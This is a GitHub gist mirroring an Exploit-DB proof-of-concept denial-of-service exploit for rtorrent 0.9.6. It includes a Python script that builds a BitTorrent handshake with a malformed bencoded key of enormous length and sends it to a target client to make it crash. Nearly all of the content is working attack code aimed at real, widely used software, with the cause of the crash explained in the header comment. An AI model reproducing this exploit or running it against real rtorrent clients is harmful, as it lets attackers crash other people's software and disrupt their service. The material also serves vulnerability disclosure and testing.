Skip to content

Instantly share code, notes, and snippets.

@rcx

rcx/exploit.py

Created September 5, 2018 04:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rcx/7d76a53c095432b65e2e3fc4a057c2c7 to your computer and use it in GitHub Desktop.
Save rcx/7d76a53c095432b65e2e3fc4a057c2c7 to your computer and use it in GitHub Desktop.
Download ZIP
rtorrent 0.9.6 - Denial of Service (mirror from exploitdb)
Raw
exploit.py
# Mirror of https://www.exploit-db.com/exploits/44894/
# Exploit Title: rtorrent 0.9.6 - Denial of Service
# Date: 2018-01-10
# Exploit Author: ecx86
# Vendor Homepage: http://rtorrent.net
# Software Link: https://github.com/rakshasa/rtorrent/releases
# Version: <= 0.9.6
# Tested on: Debian GNU/Linux 9.4 (stretch)
# This crash is due to a bad bencode parse of the handshake data map.
# Specifically, by providing a massive length for a string, namely the key of a map entry,
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
# client, or when a downloading rtorrent client connects to a malicious peer.
#!/usr/bin/env python
import socket
import struct
crash = ''
proto_name = 'BitTorrent protocol'
crash += chr(len(proto_name)) + proto_name # magic
crash += '00000000' # reserved extension bytes
# sha1 hash of info dictionary
# change this depending on your torrent
crash += '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
crash += '00000000000000000000' # peer id
msg = ''
msg += struct.pack('<H', 20) # message type: extended
msg += 'd99999999999999999999999999999999:' # payload
crash += struct.pack('>I', len(msg))
crash += msg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('1.3.3.7', 6890))
s.send(crash)
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment